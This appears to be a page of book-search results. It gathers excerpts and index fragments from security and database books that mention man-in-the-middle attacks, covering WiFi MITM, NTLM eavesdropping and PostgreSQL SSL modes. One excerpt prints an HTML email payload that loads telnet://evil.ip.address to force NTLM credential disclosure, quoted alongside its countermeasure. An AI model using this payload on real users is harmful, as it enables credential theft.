See Tolerant Reader delivery assurance, Idempotent Retry example, 217–219 structural changes to, 229–230 Messages, ESB canonical set, 222 converting to canonical form, 222–223 Guaranteed Delivery [EIP], 223–224 Message Stores [EIP], 223–224 Orchestration Engines, 224–225 routing, 222 workflow management, 224–225 Microformat, definition, 286 MIDL (Microsoft Interface Definition Library), 287 MIME (Multipurpose Internet Mail Extensions), 287. See also Media type MITM (Man-in-the-Middle Attack), 286 MOM (Message-Oriented Middleware), web service alternative, 8–9 MSMQ (Microsoft Message Queuing), 287 MTOM (Message Transmission Optimization Mechanism), 286 MVC pattern. See ASP.NET MVC N NAck (Negative Acknowledgment), 61 Naming DTOs, 99 Negotiating media preferences. See Media Type Negotiation Network efficiency, Service Descriptors, 177–178 Nondeterministic content models, 287 Normalizer [EIP], 273 I NDEX Notification.


pages: 889 words: 433,897

The Best of 2600: A Hacker Odyssey by Emmanuel Goldstein

affirmative action, Apple II, call centre, don't be evil, Firefox, game design, Hacker Ethic, hiring and firing, information retrieval, John Markoff, late fees, license plate recognition, Mitch Kapor, MITM: man-in-the-middle, optical character recognition, packet switching, pirate software, place-making, profit motive, QWERTY keyboard, RFID, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Silicon Valley, Skype, spectrum auction, statistical model, Steve Jobs, Steve Wozniak, Steven Levy, Telecommunications Act of 1996, telemarketer, undersea cable, Y2K

And yes, I also set the “Allow automatic table additions” option back to off. Anyhow, I hope this proves interesting for some of you wireless hackers out there. An Old Trick for a New Dog—WiFi and MITM (Winter, 2004-2005) by uberpenguin If you are reading this magazine, it is probably safe to assume you are familiar with the concept of a man-in-the-middle attack (which from here will be referred to as MITM for brevity) as it pertains to networking resources. In this article I hope to point out how this old and well known concept can be applied to an 802.11 WiFi network. I will use a case study of a fairly large wireless network I have access to in order to illustrate a possible scenario of a WiFi MITM attack. The Network First, let’s establish that gaining access to the network is not going to be discussed here. In my case study I already had legitimate access to the network and formulated my scenario from the point of view of one of the numerous persons who also have access to this wireless network.

(Ed Cummings), saga, 531–534 Clipper Chip, 556 against COCOTs, 458 defendants forced to accept plea agreement, 547–550 Digital Telephony Bill passes, 559–561 EFF, defined, 501–503 EFF, lawsuit against, 511 freedom of speech on Net, 538–540 fun ways to prosecute hackers, 555–556 hacker-bashing in Congress, 550–552 hackers and, 491–492 hackers in jail, 526–528 hackers vs. criminals, 553–554 hysteria dictating, 562 inspiring events, 557–559 Kevin Mitnick case, 528–530, 534–535 learning from hackers, 554–555 major crackdowns, 523–526 misunderstanding of new technology, 552–553 misunderstanding of technology, 562–565 negative feedback about hackers, 503–509 no more secrets, 535–538 Operation Sun Devil. see Operation Sun Devil poorly designed systems, 554 publicity facts and rumors, 509–510 punishments outweighing crimes, 544–546 Secret Service and 2600 . see Secret Service and 2600 meetings Steve Jackson wins lawsuit, 511 violence, vandals and victims, 566–569 lawsuits, 2000 and beyond, 573–599 DeCSS trial, 584–585, 587–589 freedom of speech, 594–596 H2K conference, 589–591 Kevin Mitnick, 586–587 litigation madness of, 580–584 MPAA lawsuit against 2600, 576–580 overview of, 573–575 positivity, 596–599 signs of hope, 591–594 what we are losing, 575–576 LCC EPROMs, 427 LCD displays electronic pay phones, 39–40 hacking soda machines, 721–722 New York MTA turnstiles, 789 LECs (Local Exchange Carriers) defined, 490 directory assistance idiocy, 655–657 incoming international collect fraud and, 480 revenue from access charges, 488–489 third-party billing fraud and, 478–479 LED signs, hacking, 325–327 Left Hand Side (LHS), RFC822 mail addresses, 153–155 Legion of Doom charges against, 495–496 overview of, 525 sentencing of three members of, 509–510 statement from, 497 Legions of the Underground (LoU), 260 Letter Sorting Machine (LSM), USPS, 374–375, 377 LFSRs (Linear Feedback Shift Registers), DeCSS code, 584–585 LG cell phones, 747–748 94192bindex.qxd 6/3/08 3:29 PM Page 853 Index LHS (Left Hand Side), RFC822 mail addresses, 153–155 Light Guide cabling, 53 Lightning, Knight (Craig Neidorf) bittersweet victory of, 501 EFF legally intervenes in case of, 502–503 facts and rumors, 509–510 indictment against, 494–495 views from a Fed, 384–385 line reversal, pay phones, 38 Linear Feedback Shift Registers (LFSRs), DeCSS code, 584–585 linear LNBs, 763 Link Access Protocol for D-channel, modified (LAPDm), GSM, 431 LinNeighborhood program, 742–743 linux-wlan-ng drivers, 739 listening devices. see surveillance devices LNB (Low Noise Block), satellite dishes, 762–763 Local Access Transport Area (LATA), 488–490 Local Exchange Carriers. see LECs (Local Exchange Carriers) local toll calling, 488 location area identifiers (LAIs), GSM phones, 431, 433 location updating, GSM phones, 433 lock picks, 777–780 locks, hacking. see Simplex locks LocusLink, 824 LOD. see Legion of Doom login hacking into VMS systems, 130 hacking University Applications Processing Center, 134–135 hacking voicemail, 472 RSTS/E, 127–128 logistics, lottery, 781 Long Distance Wholesale Club, 484 long-distance services 1986 suggestions for, 139–140 calling card fraud, 423–424 catching phone phreaks, 109–112 dark side of Ma Bell breakup, 71–73 divesture and, 82–85 equal access and, 93–97 hacker view on toll fraud, 219–220 hacking pay phones, 655 how companies work, 66–67 IBM audio distribution systems, 69–71 in-band signaling principles, 27–28 MCI, 67–69 microwave links, 67 multi-carrier toll abuse, 222–223 pay phone rates, 446–447 signaling system for, 27 successful teleconferencing, 76–82 Travelnet, 73–76 where charges come from, 487–490 long-range listening devices, surveillance, 350 loop extenders, 359 loops, Michigan, 12–13 lottery, hacking, 780–785 application, 783–784 conclusions, 784–785 logistics, 781 myths, 784 observing, 646–648 overview of, 780–781 procedure, 782–783 statistics, 781–782 LoU (Legions of the Underground), 260 Low Noise Block (LNB), satellite dishes, 762–763 LSM (Letter Sorting Machine), USPS, 374–375, 377 Luciferase gene, 822–824 Lyngsat Satellite Index, 765 M M15 emulation, 392 Ma Bell diverters, 60–62 divesture, 82–85 early phreak days, 44–45 friends in high places story, 55–56 getting into central office, 52–55 introducing competition to, 62–63, 68 operators, 47–48 overview, 44 small-time rural phone companies, 55–56 step offices, 49–52 surveying COSMOS, 59–60 switching centers, 45–46 teleconferencing story, 11–12 tragic side of breakup, 71–73 MAC addresses, 741, 743 MacNeil-Lehrer Report, 189 853 94192bindex.qxd 6/3/08 3:29 PM Page 854 854 Index MAEs (Metropolitan Area Ethernets), 304–305 mail systems ARPANET, 148 BITNET, 149 CSNet, 149 Mailnet, 149 MCI Mail, 159–161 networks sharing RFC822 electronic, 152–153 UUCP network, 149, 152 Mailnet, 149–151 mains powered transmitters, 354 malls, hackers in, 512–514 Manhattan Project, 5–7 man-in-the-middle attacks (MITMs), WiFi, 744–746 manuals, exploring cell phones, 425 MapQuest, 638 Marine law enforcement agencies, 620–623 marine telephone fraud, 423–424 Market Navigation, 81 MARK-facer canceler, USPS, 373–374, 376–377 marking methods, viruses, 291 Markoff, John lies of, 249–250, 252 as portrayed in The Fugitive Game, 246–247 stories about Kevin Mitnick, 529 Marshall, General, 4–5 MasterCard, 113 Masters of Deception (Quittner), 559 Masters of Deception (Slatalla and Quittner), 239–242 Master/Session key management, 709–710 Maxfield, John, 184 McAfee, John, 290–293 McAfee Associates, 292 McGruder, Aaron, 593 MCI (Microwave Communications Inc) 800-FRIENDS update service, 464 access code, 94 challenging Bell monopoly, 83 dishonest tactics of, 168–170 features of, 68–69 Friends and Family Circle gimmick, 463–464 long-distance fraud lawsuits of, 114 multi-carrier toll abuse and, 222–223 in nineties, 463–464 no method for finding codes, 68 overview of, 67–68 MCI Mail, 158–161, 170 MCI Worldcom backbone provider, 303 MCI.NET, 303 McKinney, Gene, 622 MD-5 cryptography, 312 media, in 1990s, 256–265 guiding perceptions about hackers, 256–258 hitting big time, 258–261 investigation and reporting, 261–265 mega-mergers, telephone, 482 Melissa virus, 581 MEM (MetroCard Express Machine), 785, 787–789 memory, in brain, 824–825 memory, increasing pager, 345 MEPS (Military Entry Processing Station), 628 Mercedes Benz, hacking, 772 MESSAGE CENTER voice mail, 473–474 Message Transfer Part (MTP) packets, 432 messages, pager. see pagers MetroCard Express Machine (MEM), 785, 787–789 MetroCard Vending Machine (MVM), 785, 787–789 MetroCards decoding Dual-Track - Track 1-2, 792–794 decoding Dual-Track - Track 3, 791–792 reading, 790 swiping on turnstile, 789 system of, 787–788 terminology, 785–786 Metrofone, 66–69 800 numbers, 92 Metropolitan Area Ethernets (MAEs), 304–305 Metropolitan Transportation Authority (MTA), 785 MF (multifrequency) tones blue boxes, 24 for cellular telephones, 105 history of blue boxing, 28–29 in-band signaling principles, 28 Michigan loops, 12–13 microphones coaxial cable, 352 contact, 350–351 hidden-wire line, 351 with in-line amplifier, 351 parabolic, 350 pizoelectric coaxial, 357 shotgun, 350 spike, 351 94192bindex.qxd 6/3/08 3:29 PM Page 855 Index telephone line, 352 tube, 351 Microsoft Outlook security weakness, 581 microwaves cellular telephones, 87 long-distance, 67 toll pass systems, 328 military consequences of hacking into, 301–302 experiences as paid hacker for, 405–408 Fortezza project, 310–312 military and war zone hacking stories, 618–630 backdoor exits from U.S.

Military, 627–628 circumventing DOD’s SmartFilter, 628–630 getting busted, 619–625 hacker goes to Iraq, 618–619 Military Entry Processing Station (MEPS), 628 Miller, Johnny Lee, 243–245 MILNET, 145–146 MIN (Mobile Identification Number) Cellemetry service, 436–437 cellular fraud and, 98, 479 NAM chip containing, 106 programming CMT, 107 roaming, 108 safe cellular phreaking using, 103 miniature tape recorders, 361–362 MINIX operating system, 392–396 Miramax, Takedown screenplay, 249–256 MISSI (Multilevel Information Systems Security Initiative), 310–312 MITMs (man-in-the-middle attacks), WiFi, 744–746 Mitnick, Kevin conditional freedom of, 564, 586–587 on doing time, 586 facts in, 523 false charges against, 528–529 forced to accept plea agreement, 538, 547–550 “Free Kevin” campaign, 252–253, 255–256 how this can happen, 544–546 imprisonment of, 526 indictment against, 531 media guiding perception of, 257–258 as portrayed in Cyberpunk , 235–238, 246 as portrayed in The Fugitive Game, 246–247 psychological and physical torture of, 569 punishment far outweighing crime, 534–535, 544–546 raid on, 202–203 as role model for overcoming adversity, 597 Takedown screenplay and, 249–252, 254–256 testifying before Senate about hackers, 580 what was lost, 575–576 MLOCR (Multiline Optical Character Reader), 375–377 Mobile Identification Number. see MIN (Mobile Identification Number) Mobile Station Integrated Services Digital Network (MSISDN) number, 429–430, 433–434 Mobile Station Roaming Number (MSRN), GSM, 433–434 Mobile Switching Center (MSC), GSM, 431–434 Mobile Telephone Switching Office. see MTSO (Mobile Telephone Switching Office) mobile telephones. see cellular phones Mobile Top Up phone card, Afghanistan, 659 MOD, 525, 527–528 Modern Biology, Inc., 822–823 modulation transmitters, advanced, 355 Monsanto’s Roundup Ready crops, 821 Morris, Robert T., 155–156, 235 Morse Code, 368–369 MOSAIC project, 310 Motion Picture Association of America. see MPAA (Motion Picture Association of America) Motorola, 363 motors, surveillance tape recorders, 361 MPAA (Motion Picture Association of America) DeCSS code and, 574 DeCSS trial verdict, 587–591 lawsuit against 2600 and others, 576–577 opposition to motions of, 583 people realizing true motives of, 591, 593 MSC (Mobile Switching Center), GSM, 431–434 MSISDN (Mobile Station Integrated Services Digital Network) number, 429–430, 433–434 MSRN (Mobile Station Roaming Number), GSM, 433–434 MTA (Metropolitan Transportation Authority), 785 MTP (Message Transfer Part) packets, 432 MTSO (Mobile Telephone Switching Office) checking valid cellular call number, 98 how cell phones work, 86 recognizing access codes, 106 roaming, 108 safe cellular phreaking and, 103 multi-carrier toll abuse, 222–223 855 94192bindex.qxd 6/3/08 3:29 PM Page 856 856 Index multifrequency tones. see MF (multifrequency) tones Multilevel Information Systems Security Initiative (MISSI), 310–312 multiline dial-out slave infinity device, 359 Multiline Optical Character Reader (MLOCR), 377 multiplexing, GSM phones, 431–432 multitrack recording, surveillance tape recorders, 362 muting mouthpiece, COCOTs, 452 MVM (MetroCard Vending Machine), 785, 787–789 MW/MHWMWNC (Wall Mount Enclosures), 608 Mykotronx, Inc., 312 N Nagra Magnetic Recorders, Inc., 362 NAM (Number Assignment Module) programming CMT, 107 safe cellular phreaking and, 103 security of, 106 named exchanges, 484–486 NAPs, system of, 304–305 Napster, 581–582 narrow band transmitters, 356 National Assembly of Hackers, 249 National Biometrics Test Center, 811 National Direct Dial (NDD) code, Afghan phone system, 658 National RNZ 36, 362 National Science Foundation Network (Nsfnet), 152 National Security Agency. see NSA (National Security Agency) National Semiconductor, Fortezza cards, 312 national signaling systems, 470–472 NATO allies, AUTOVON tied to, 31 Naval Intelligence, lobbying for Digital Telephony Bill, 561 Navy law enforcement agencies, 620–623 NCR ATMs, hacking, 765–768 NDD (National Direct Dial) code, Afghan phone system, 658 near infrared technology, vehicles, 329 Nedap voting machine, 807–808 Neidorf, Craig. see Lightning, Knight (Craig Neidorf) neighborhood security gates, 419–420 neighbors’ networks, hacking, 739–743 net, early days. see Internet, early days of Netcom, Kevin Mitnick case, 528–529 NetNorth, 152 NetStumbler, 734 network code, identifying GSM provider, 429 Network Processor. see NP (Network Processor) Network Solutions, 583 Network-Based ALI, 681–682 network-layer encryption, wireless networks, 737 networks beginning of Internet, 148–151 hacking paging, 345–349 Internet, 303 reading addresses, 153–155 Worldnet, 151–153 Neuromancer (Gibson), 235 New York City Transit Authority (NYCTA), 785 New York Telephone/NYNEX. see NYNEX/New York Telephone New York’s MTA, 785–794 conclusions, 794–795 Cubic Transportation Systems, 786–787 decoding Dual-Track MetroCards - Track 1-2, 792–794 decoding Dual-Track MetroCards - Track 3, 791–792 MetroCard system, 787–788 overview of, 785 reading MetroCards, 790 receipts, 788–789 terminology, 785–786 turnstiles, 789 vending machines, 788 newsgroups, elite speak in, 816 nmap, 742 non-beaconing, 737 non-judicial punishment, military law, 621 NON-PUBDA#, obtaining from CN/A operator, 48 no-pick option, and equal access, 97 Nortel DMS-MSC, GSM switch, 431 Northern Telecommunications, long-distance services made by, 67 Notepad, 638 Novatel CMTs, 104 NOVRAM chips, 427 NP (Network Processor) CampusWide infrastructure and, 608–609 94192bindex.qxd 6/3/08 3:29 PM Page 857 Index CampusWide server, 605 conducting simple transaction, 610–611 exploits, 611–612 getting into database through, 606 NPA (area code), pagers, 346 NSA (National Security Agency) Clipper Chip proposal, 556 cryptosystem of, 308 Digital Telephony Bill lobbying of, 561 Fortezza project, 310–312 invasion of citizen privacy, 552 secretive research of, 309–310 Nsfnet (National Science Foundation Network), 152 NTS Connection, MCI affiliation with, 169–170 Number Assignment Module. see NAM (Number Assignment Module) number restriction, COCOTs, 452 numbering system, world phone zones, 467–468 numbers 800, 92–93, 111–112 976 (dial-it) numbers, 62 Automatic Number Identifier, 61 determining hot sets of lottery, 646–648 ESN. see ESN (Electronic Serial Number) MIN. see MIN (Mobile Identification Number) NAM. see NAM (Number Assignment Module) numbers, COCOT phone call forwarding, 456–457 overview of, 453–454 numbers, stories about, 7–15 overview of, 7 scariest number in world, 8–9 teleconferencing saga, 11–15 truth about 9999, 9–11 Nunn, Senator Sam, 257 NYCTA (New York City Transit Authority), 785 NYCWireless group, 737–738 NYNEX/New York Telephone as Baby Bell, 83 changes to pay phones, 482–483 competing with Ma Bell, 62 exposing, 175–176 mega-mergers, 482 sleazy practices of, 157–158 O @o command, ARPANET, 146–147 OGM (outgoing message), answering machines, 660–662 OLD command, RSTS/E, 128 omnidirectional antennas, radio piracy, 760 OmniMetrix, 436 Omnipoint, 483 OneCard system. see CampusWide system op-diverting, ANI-fails, 665 OpenQubit, 288–289 Openwave, 747–749 Operation Sun Devil bittersweet victory, 501 crackdown, 493–496 hunt intensifies, 496–498 increased restrictions, 498–499 no time for complacency, 500–501 overview of, 492–493 operators Amateur Radio, 367–369 conferencing and, 81 enabling calls to special, 48–49 genesis of, 27 pagers sending out messages via, 341 types of, 47–48 Optim9000. see CampusWide system OptoComs, Chrome Box, 324–325 orangeboxing, 666 ORed (XORed) burst period, 432 Orinoco cards, 735 Orion, 436 OSUNY bulleting board, 23 outgoing message (OGM), answering machines, 660–662 out-of-band signaling, 27 overlay codes, 486 P Pacific Bell, wiretapping, 555 Pacific Telesis, 83 packet types, 802.11b, 734 pagefile.sys, 286 pagers, 339–345 decoding setup, 346–349 defined, 340 for free, 101–102 how messages are sent to, 340 how network works, 345–346 message length, 342 other questions, 342–345 sending out messages, 341 types of, 340 857 94192bindex.qxd 6/3/08 3:29 PM Page 858 858 Index PAI (public and international) accounts, Dell, 697, 699 Paketto Keiretsu, 701 PANI (Pseudo-ANI), 665 Pansat 2500A receivers, 763–764 paper clips, as lockpickers, 778 parabolic microphones, 350 ParadisePoker.com blackjack story, 644–646 parallel transmitters, 360 parasitic grids, 737–738 parole eligibility, military, 624–625 party lines, wiring for, 24 Passback Period, New York’s MTA, 786 passive detection, wireless networks, 734–735 passwords, 163 answering machine hacking, 660–662 Answers for Gateway, 730 COSMOS, 59 DEC-20, 124–125 electronic message center, 769 FirstClass, 617 IBM’s Audio Distribution System, 69–71 Internet radio stations, 306 MCI Mail, 160–161 military, 406–408 negative feedback on hacking, 503–504 printing password file, 60 Radio Shack screensaver, 706 RSTS/E, 127–128 Telemail, 122–124 UAPC, 135–136 VMS systems, 130 Watson system at T-Mobile stores, 676 patterns, lottery number, 784 pay phones, 35–43. see also COCOTs (Customer Owned Coin Operated Telephones) abuse of, 41–43 alternate designs, 38–40 charging for toll-free numbers from, 487 cheese box, 40–41 clear box working on post-pay, 32–33 hacking three holed, 652–655 history of, 36 in the nineties, 482–483 operation logic, 36–37 types of, 39 what happens to your money, 37–38 why redboxing doesn’t work, 446–448 pay TV descramblers, making, 332–333 PayPal, transaction reversals, 725–729 PBX (Private Branch eXchange) digital telephone abuse, 43 electronic pay phones, 39–40 multi-carrier toll abuse, 222–223 teleconferencing dangers, 79 teleconferencing using, 77 PCMCIA card, 310 PCP (PC Pursuit), 141–144, 164–165 PCS (Personal Communications Services), GSM, 428–429 PCs, Kmart, 715 peering, Internet, 302–305 pen registers, 183 Pengo, 235 Pentagon City Mall, 512 People Express, 166–168 Peripheral Interchange Program (PIP), RSTS/E, 128 peripheral nervous system, 826 Personal Communications Services (PCS), GSM, 428–429 personal identification code (PIC), Pronto, 164 Personal Identification Number (PIN), GSM SIM cards, 430 Personal Unblocking Key (PUK), 430 personalized info, XM Radio signal, 755 Pfaelzer, Mariana, 549 PHALSE (Phreakers, Hackers, and Laundromat Service Employees), 525 pharmacy computers, Wal-Mart, 714 phase-locked look (PLL) transmitter, radio piracy, 759–761 Phiber Optick case, 523, 526–527 philosophy. see hackers, philosophy phone cards, Afghan, 659 phone phreaking, 21st century, 659–680 ANI and Caller ID spoofing, 664–669 answering machine hacking, 659–662 backspoofing, 672–675 feeding the frenzy of Internet threats, 662–663 fun of prosecuting for, 555 getting more from T-Mobile, 675–679 tracking any U.K.


pages: 260 words: 40,943

Hacking Exposed: Network Security Secrets and Solutions by Stuart McClure, Joel Scambray, George Kurtz

AltaVista, bash_history, Larry Wall, MITM: man-in-the-middle, peer-to-peer, remote working, web application

It’s also pertinent to mention here that the LAN Manager Authentication Level setting in Security Policy can make it much more difficult to extract user credentials from NTLM challenge-response exchanges, as discussed in Chapter 5. Setting it to Send NTLMv2 Response Only or higher can greatly mitigate the risk from LM/NTLM eavesdropping attacks. (This assumes the continued restricted availability of programs that will extract hashes from NTLMv2 challenge-response traffic.) Rogue server and man-in-the-middle (MITM) attacks against NTLMv2 authentication are still feasible, assuming that the rogue/MITM server can negotiate the NTMv2 dialect with the server on behalf of the client. IRC HACKING Internet Relay Chat (IRC) remains one of the more popular applications on the Internet, driven not only by the instant gratification of real-time communications, but also by the ability to instantaneously exchange files using most modern IRC client software.

This also allows an attacker to craft an HTML email message that forces an outbound authentication over any port: <html> <frameset rows="100%,*"> P:\010Comp\Hacking\381-6\ch16.vp Monday, September 10, 2001 9:44:31 AM ProLib8 / Hacking Exposed: Network Security Color profile: Generic CMYK printer profile Composite Default screen Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16 Chapter 16: Hacking the Internet User <frame src=about:blank> <frame src=telnet://evil.ip.address:port> </frameset> </html> Normally, this wouldn’t be such a big deal, except that on Win 2000, the built-in telnet client is set to use NTLM authentication by default. Thus, in response to the preceding HTML, a Win 2000 system will merrily attempt to log on to evil.ip.address using the standard NTLM challenge-response mechanism. This mechanism, as we saw in Chapter 5, can be vulnerable to eavesdropping and man-in-the-middle (MITM) attacks that reveal the victim’s username and password. This attack affects a multitude of HTML parsers and does not rely on any form of Active Scripting, JavaScript or otherwise. Thus, no IE configuration can prevent this behavior. Credit goes to DilDog of Back Orifice fame, who posted this exploit to Bugtraq. for Telnet:// Attacks U Countermeasures Network security best practices dictate that outbound NTLM authentication traffic be blocked at the perimeter firewall.


pages: 360 words: 96,275

PostgreSQL 9 Admin Cookbook: Over 80 Recipes to Help You Run an Efficient PostgreSQL 9. 0 Database by Simon Riggs, Hannu Krosing

business intelligence, business process, database schema, Debian, en.wikipedia.org, full text search, GnuPG, MITM: man-in-the-middle, Skype

I want to be sure that I connect to a server that I trust. 146 Chapter 6 SSL mode Eavesdropping protection MITM protection Statement verify-full Yes Yes I want my data encrypted, and I accept the overhead. I want to be sure that I connect to a server I trust, and that it's the one I specify. The MITM in the preceding table means Man-In-The-Middle attack, that is, someone posing as your server, but actually just observing and forwarding the traffic. Checking server authenticity The last two SSL modes allow you to be reasonably sure that you are actually talking to your server, by checking the SSL certificate presented by the server. See also To understand more about SSL in general, and OpenSSL library used by PostgreSQL in particular, visit http://www.openssl.org, or get a good book about SSL. There was also a nice presentacion named "Encrypted PostgreSQL" explaining these issues at pgcon2009. The slides are available at the following website: http://www.pgcon.org/2009/schedule/events/120.en.html Encrypting sensitive data This recipe shows how to encrypt data using the pgcrypto package.

The following commands generate a self-signed certificate for your server: openssl genrsa 1024 > server.key openssl req -new -x509 -key server.key -out server.crt Read more on x509 keys and certificates in openSSL's HowTo pages at the following website: http://www.openssl.org/docs/HOWTO/ Setting up a client to use SSL Client behavior is controlled by an environment variable, PGSSLMODE, that can have the following values, as defined in the official PostgreSQL documents: SSL mode Eavesdropping protection MITM protection Statement disabled No No I don't care about security, and I don't want to pay the overhead of encryption. allow Maybe No I don't care about security, but I will pay the overhead of encryption if the server insists on it. prefer Maybe No I don't care about encryption, but I wish to pay the overhead of encryption if the server supports it. require Yes No I want my data to be encrypted, and I accept the overhead. I trust that the network will make sure I always connect to the server that I want. verify-ca Yes Depends on I want my data encrypted, and I accept the CA-policy overhead. I want to be sure that I connect to a server that I trust. 146 Chapter 6 SSL mode Eavesdropping protection MITM protection Statement verify-full Yes Yes I want my data encrypted, and I accept the overhead.


pages: 448 words: 117,325

Click Here to Kill Everybody: Security and Survival in a Hyper-Connected World by Bruce Schneier

23andMe, 3D printing, autonomous vehicles, barriers to entry, bitcoin, blockchain, Brian Krebs, business process, cloud computing, cognitive bias, computer vision, connected car, corporate governance, crowdsourcing, cryptocurrency, cuban missile crisis, Daniel Kahneman / Amos Tversky, David Heinemeier Hansson, Donald Trump, drone strike, Edward Snowden, Elon Musk, fault tolerance, Firefox, Flash crash, George Akerlof, industrial robot, information asymmetry, Internet of things, invention of radio, job automation, job satisfaction, John Markoff, Kevin Kelly, license plate recognition, loose coupling, market design, medical malpractice, Minecraft, MITM: man-in-the-middle, move fast and break things, move fast and break things, national security letter, Network effects, pattern recognition, profit maximization, Ralph Nader, RAND corporation, ransomware, Rodney Brooks, Ross Ulbricht, security theater, self-driving car, Shoshana Zuboff, Silicon Valley, smart cities, smart transportation, Snapchat, Stanislav Petrov, Stephen Hawking, Stuxnet, The Market for Lemons, too big to fail, Uber for X, Unsafe at Any Speed, uranium enrichment, Valery Gerasimov, web application, WikiLeaks, zero day

How to enable it and why you should,” CSO, https://www.csoonline.com/article/3239144/password-security/what-is-two-factor-authentication-2fa-how-to-enable-it-and-why-you-should.html. 47This, of course, isn’t perfect, either: Andy Greenberg (26 Jun 2016), “So hey you should stop using texts for two-factor authentication,” Wired, https://www.wired.com/2016/06/hey-stop-using-texts-two-factor-authentication. 47Sprint, T-Mobile, Verizon, and AT&T: Steve Dent (8 Sep 2017), “U.S. carriers partner on a better mobile authentication system,” Engadget, https://www.engadget.com/2017/09/08/mobile-authentication-taskforce-att-verizon-tmobile-sprint. 47Among other security protections: Dario Salice (17 Oct 2017), “Google’s strongest security, for those who need it most,” Keyword, https://www.blog.google/topics/safety-security/googles-strongest-security-those-who-need-it-most. 47Sticky-note passwords regularly show up: Here’s one example from 2018: Kif Leswing (16 Jan 2018), “A password for the Hawaii emergency agency was hiding in a public photo, written on a Post-it note,” Business Insider, http://www.businessinsider.com/hawaii-emergency-agency-password-discovered-in-photo-sparks-security-criticism-2018-1. 48Your smartphone has evolved into: Gary Robbins (23 Apr 2017), “The Internet of Things lets you control the world with a smartphone,” San Diego Union Tribune, http://www.sandiegouniontribune.com/sd-me-connected-home-20170423-story.html. 48A hacker can convince a cell provider: Steven Melendez (18 Jul 2017), “How to steal a phone number and everything linked to it,” Fast Company, https://www.fastcompany.com/40432975/how-to-steal-a-phone-number-and-everything-linked-to-it. 48They’ll reset bank accounts: Alex Perekalin (19 May 2017), “Why two-factor authentication is not enough,” Kaspersky Daily, https://www.kaspersky.com/blog/ss7-attack-intercepts-sms/16877. Nathaniel Popper (21 Aug 2017), “Identity thieves hijack cellphone accounts to go after virtual currency,” New York Times, https://www.nytimes.com/2017/08/21/business/dealbook/phone-hack-bitcoin-virtual-currency.html. 49This is called a man-in-the-middle attack: Rapid7 (9 Aug 2017), “Man-in-the-middle (MITM) attacks,” Rapid7 Fundamentals, https://www.rapid7.com/fundamentals/man-in-the-middle-attacks. 49A credit card issuer might flag: Gartner (accessed 24 Apr 2018), “Reviews for online fraud detection,” https://www.gartner.com/reviews/market/Online Fraud DetectionSystems. 50This was one of the techniques: David Kushner (26 Feb 2013), “The real story of Stuxnet,” IEEE Spectrum, https://spectrum.ieee.org/telecom/security/the-real-story-of-stuxnet. 50For years, though, hackers have been: Dan Goodin (3 Nov 2017), “Stuxnet-style code signing is more widespread than anyone thought,” Ars Technica, https://arstechnica.com/information-technology/2017/11/evasive-code-signed-malware-flourished-before-stuxnet-and-still-does.

Sharon Goldberg (22 Jun 2017), “Surveillance without borders: The ‘traffic shaping’ loophole and why it matters,” Century Foundation, https://tcf.org/content/report/surveillance-without-borders-the-traffic-shaping-loophole-and-why-it-matters. 22In 2013, one company reported: Jim Cowie (19 Nov 2013), “The new threat: Targeted Internet traffic misdirection,” Vantage Point, Oracle + Dyn, https://dyn.com/blog/mitm-internet-hijacking. 22In 2014, the Turkish government: Jim Cowie (19 Nov 2013), “The new threat: Targeted Internet traffic misdirection,” Vantage Point, Oracle + Dyn, https://dyn.com/blog/mitm-internet-hijacking. 22In 2017, traffic to and from: Dan Goodin (13 Dec 2017), “‘Suspicious’ event routes traffic for big-name sites through Russia,” Ars Technica, https://arstechnica.com/information-technology/2017/12/suspicious-event-routes-traffic-for-big-name-sites-through-russia. 22a 2008 talk at the DefCon hackers conference: Dan Goodin (27 Aug 2008), “Hijacking huge chunks of the internet: A new How To,” Register, https://www.theregister.co.uk/2008/08/27/bgp_exploit_revealed. 23“It’s not that we didn’t think about security”: Craig Timberg (30 May 2015), “A flaw in the design,” Washington Post, http://www.washingtonpost.com/sf/business/2015/05/30/net-of-insecurity-part-1. 23“It is highly desirable that Internet carriers”: Brian E.

AUTHENTICATION IS GETTING HARDER, AND CREDENTIAL STEALING IS GETTING EASIER In 2016, Rob Joyce, then the head of the NSA’s since-renamed Tailored Access Operations (TAO) group—basically, the country’s chief hacker—gave a rare public talk. In a nutshell, he said that zero-day vulnerabilities are overrated, and credential stealing is how he gets into networks. He’s right. As bad as software vulnerabilities are, the most common way hackers break into networks is by abusing the authentication process. They steal passwords, set up man-in-the-middle attacks to piggyback on legitimate log-ins, or masquerade as authorized users. Credential stealing doesn’t require finding a zero-day or an unpatched vulnerability, plus there’s less chance of discovery, and it gives the attacker more flexibility in technique. This isn’t just true for the NSA; it’s true for all attackers. It’s how the Chinese hackers breached the Office of Personnel Management in 2015.


pages: 492 words: 118,882

The Blockchain Alternative: Rethinking Macroeconomic Policy and Economic Theory by Kariappa Bheemaiah

accounting loophole / creative accounting, Ada Lovelace, Airbnb, algorithmic trading, asset allocation, autonomous vehicles, balance sheet recession, bank run, banks create money, Basel III, basic income, Ben Bernanke: helicopter money, bitcoin, blockchain, Bretton Woods, business cycle, business process, call centre, capital controls, Capital in the Twenty-First Century by Thomas Piketty, cashless society, cellular automata, central bank independence, Claude Shannon: information theory, cloud computing, cognitive dissonance, collateralized debt obligation, commoditize, complexity theory, constrained optimization, corporate governance, creative destruction, credit crunch, Credit Default Swap, credit default swaps / collateralized debt obligations, crowdsourcing, cryptocurrency, David Graeber, deskilling, Diane Coyle, discrete time, disruptive innovation, distributed ledger, diversification, double entry bookkeeping, Ethereum, ethereum blockchain, fiat currency, financial innovation, financial intermediation, Flash crash, floating exchange rates, Fractional reserve banking, full employment, George Akerlof, illegal immigration, income inequality, income per capita, inflation targeting, information asymmetry, interest rate derivative, inventory management, invisible hand, John Maynard Keynes: technological unemployment, John von Neumann, joint-stock company, Joseph Schumpeter, Kenneth Arrow, Kenneth Rogoff, Kevin Kelly, knowledge economy, large denomination, liquidity trap, London Whale, low skilled workers, M-Pesa, Marc Andreessen, market bubble, market fundamentalism, Mexican peso crisis / tequila crisis, MITM: man-in-the-middle, money market fund, money: store of value / unit of account / medium of exchange, mortgage debt, natural language processing, Network effects, new economy, Nikolai Kondratiev, offshore financial centre, packet switching, Pareto efficiency, pattern recognition, peer-to-peer lending, Ponzi scheme, precariat, pre–internet, price mechanism, price stability, private sector deleveraging, profit maximization, QR code, quantitative easing, quantitative trading / quantitative finance, Ray Kurzweil, Real Time Gross Settlement, rent control, rent-seeking, Satoshi Nakamoto, Satyajit Das, savings glut, seigniorage, 